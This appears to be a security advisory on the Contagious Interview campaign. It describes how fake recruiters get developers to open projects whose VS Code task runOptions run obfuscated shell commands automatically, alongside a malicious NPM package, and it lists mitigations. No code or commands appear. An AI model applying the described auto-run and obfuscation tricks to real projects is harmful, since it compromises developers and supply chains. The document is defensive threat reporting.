The Contagious Interview campaign is a targeted malware operation attributed to the North Korean Lazarus Group, focusing on software developers through fake recruitment schemes. The campaign introduces a novel infection vector by exploiting Microsoft Visual Studio Code's Task feature, specifically the runOptions property, which can be configured to automatically execute shell commands when a workspace is opened. This allows attackers to achieve remote code execution silently as developers open infected projects. The malicious commands are heavily obfuscated using techniques such as whitespace hiding and masquerading payloads as benign files like images or fonts, complicating detection. The campaign also involves a malicious NPM package, expanding the infection surface through supply chain compromise. GitHub repositories are leveraged both as infection vectors and discovery points, with attackers embedding malicious task files in public or private projects. The attack chain includes execution of shell commands (T1059.007), user execution tactics (T1204.002), process injection (T1055), obfuscation (T1027, T1564.001), and use of remote services (T1102.002). Although no known exploits in the wild have been reported, the technique is sophisticated and stealthy, targeting developer environments where trust in project files is high. The campaign's use of recruitment lures increases the likelihood of victim engagement, making it a credible threat to software development workflows.

For European organizations, this threat poses a significant risk to software development environments, potentially leading to unauthorized code execution, data exfiltration, and supply chain compromise. The infection vector targets developers who often have elevated privileges and access to critical source code repositories and build systems, amplifying the impact. Compromise could result in intellectual property theft, insertion of backdoors into software products, and disruption of development pipelines. Given the campaign's stealth and obfuscation, detection may be delayed, increasing dwell time and potential damage. Organizations involved in critical infrastructure, finance, and technology sectors are particularly vulnerable due to the strategic value of their software assets. The use of recruitment schemes may also lead to social engineering risks beyond technical exploitation. Overall, the campaign threatens confidentiality, integrity, and availability of software development processes and outputs.

1. Implement strict code review policies focusing on VS Code task files and configuration files before merging or using them in development environments. 2. Enforce the use of trusted package registries and conduct thorough vetting of NPM packages, including scanning for malicious code or unusual behaviors. 3. Monitor and restrict the use of VS Code runOptions that enable automatic command execution, possibly disabling this feature or alerting on its usage. 4. Employ static and dynamic analysis tools to detect obfuscated scripts and suspicious payloads within development repositories. 5. Educate developers about the risks of opening unknown or unsolicited project files, especially those received via recruitment or social engineering channels. 6. Use endpoint detection and response (EDR) solutions to monitor for anomalous shell command executions originating from developer tools. 7. Regularly audit GitHub repositories and other code hosting platforms for unauthorized or suspicious task files and dependencies. 8. Implement network segmentation to limit the impact of any compromise originating from developer workstations. 9. Maintain up-to-date threat intelligence feeds to detect emerging indicators related to this campaign. 10. Consider application whitelisting for developer environments to prevent execution of unauthorized scripts.